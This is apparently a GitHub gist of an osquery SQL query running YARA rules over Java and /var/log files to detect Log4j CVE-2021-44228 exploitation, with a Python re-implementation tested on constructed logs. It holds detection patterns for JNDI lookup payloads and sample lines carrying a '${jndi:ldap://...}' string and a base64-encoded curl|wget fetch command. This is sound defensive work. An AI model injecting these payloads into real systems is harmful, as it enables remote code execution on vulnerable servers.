@ureddy-uptycs
Created December 13, 2021 03:11
  • Save ureddy-uptycs/4fdd68e859f022e65e7b7779e247f0d0 to your computer and use it in GitHub Desktop.
A SQL query that can be run as a real-time query in osquery to detect whether Java processes running on a host have opened log files that contain the YARA signatures specified in the query (files under /var/log are scanned as well). The YARA rules detect exploitation indicators for the Log4j vulnerability CVE-2021-44228.
-- Real-time osquery query: run the YARA rules below against the log files
-- that java processes currently hold open (excluding kafka logs), plus
-- everything under /var/log, and return only files with at least one match.
SELECT *
FROM yara
WHERE
  (
    path IN (
      SELECT path
      FROM process_open_files
      WHERE pid IN (SELECT pid FROM processes WHERE name = 'java')
        AND path LIKE '%.log'
        AND path NOT LIKE '%kafka%'
    )
    OR path LIKE '/var/log/%%'   -- %% matches recursively in osquery path constraints
  )
  AND (
    rule = 'rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
      meta:
        description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
        author = "Florian Roth"
        reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
        date = "2021-12-10"
        score = 60
      strings:
        $x1 = "${jndi:ldap:/"
        $x2 = "${jndi:rmi:/"
        $x3 = "${jndi:ldaps:/"
        $x4 = "${jndi:dns:/"
      condition:
        1 of them
    }'
    OR rule = 'rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
      meta:
        description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
        author = "Florian Roth"
        reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
        date = "2021-12-10"
        score = 80
      strings:
        // full JNDI lookup with scheme, host, port and resource name
        $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
        // false-positive filter: lookups pointing at loopback or RFC 1918 addresses
        $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
      condition:
        $x1 and not 1 of ($fp*)
    }'
    OR rule = 'rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
      meta:
        description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
        author = "Florian Roth"
        reference = "https://twitter.com/Reelix/status/1469327487243071493"
        date = "2021-12-10"
        score = 70
      strings:
        /* curl -s  (the three base64 alignments of the plaintext) */
        $sa1 = "Y3VybCAtcy"
        $sa2 = "N1cmwgLXMg"
        $sa3 = "jdXJsIC1zI"
        /* |wget -q -O-  (the three base64 alignments of the plaintext) */
        $sb1 = "fHdnZXQgLXEgLU8tI"
        $sb2 = "x3Z2V0IC1xIC1PLS"
        $sb3 = "8d2dldCAtcSAtTy0g"
      condition:
        1 of ($sa*) and 1 of ($sb*)
    }'
  )
  AND count > 0
  AND path NOT LIKE '%osqueryd.worker.log'   -- ignore the osqueryd worker log itself
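The logic of the three rules re-implemented in Python as an added illustration (not code from the gist or from the rule author), run over constructed log contents: it shows why the Hard rule stays silent on a lookup pointing at a private address while the Soft rule still fires, and that, as in the yara table, the $fp exclusion applies to the whole file rather than to a single line. The sample log lines and the base64-encoded command are constructed.

```python
import base64
import re

# Plain-string indicators from EXPL_Log4j_CVE_2021_44228_Dec21_Soft
SOFT_STRINGS = ("${jndi:ldap:/", "${jndi:rmi:/", "${jndi:ldaps:/", "${jndi:dns:/")

# $x1 and the $fp1r exclusion from EXPL_Log4j_CVE_2021_44228_Dec21_Hard,
# transcribed into Python regex syntax (`:\/[\/]?` becomes `:/{1,2}`)
HARD_RE = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns):/{1,2}[a-z0-9.\-]{3,120}:[0-9]{2,5}/[a-zA-Z.]{1,32}\}")
HARD_FP_RE = re.compile(
    r"(ldap|rmi|ldaps|dns):/{1,2}(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)")

# Base64 fragments from SUSP_Base64_Encoded_Exploit_Indicators_Dec21; each
# tuple covers the three possible alignments of the plaintext inside base64
SA = ("Y3VybCAtcy", "N1cmwgLXMg", "jdXJsIC1zI")                      # "curl -s "
SB = ("fHdnZXQgLXEgLU8tI", "x3Z2V0IC1xIC1PLS", "8d2dldCAtcSAtTy0g")  # "|wget -q -O- "


def match_rules(text):
    """Return the names of the rules whose condition holds for the whole text.

    Like the yara table, the rules are evaluated per file, not per line: the
    Hard rule's `not 1 of ($fp*)` suppresses the match if a private-address
    lookup appears anywhere in the file.
    """
    hits = []
    if any(s in text for s in SOFT_STRINGS):
        hits.append("EXPL_Log4j_CVE_2021_44228_Dec21_Soft")
    if HARD_RE.search(text) and not HARD_FP_RE.search(text):
        hits.append("EXPL_Log4j_CVE_2021_44228_Dec21_Hard")
    if any(s in text for s in SA) and any(s in text for s in SB):
        hits.append("SUSP_Base64_Encoded_Exploit_Indicators_Dec21")
    return hits


# Constructed sample log contents (not real captures)
CLEAN_LOG = 'GET /index.html HTTP/1.1 200 "Mozilla/5.0"\n'
INTERNAL_LOG = 'GET / HTTP/1.1 404 "${jndi:ldap://10.0.0.5:1389/a}"\n'      # lab-internal scanner
EXTERNAL_LOG = 'GET / HTTP/1.1 404 "${jndi:ldap://198.51.100.7:1389/a}"\n'  # documentation-range address
B64_LOG = "X-Api-Version: " + base64.b64encode(
    b"curl -s http://x/a|wget -q -O- http://x/a").decode() + "\n"

if __name__ == "__main__":
    for name, log in (("clean", CLEAN_LOG), ("internal", INTERNAL_LOG),
                      ("external", EXTERNAL_LOG), ("base64", B64_LOG)):
        print(f"{name:9s} -> {match_rules(log)}")
```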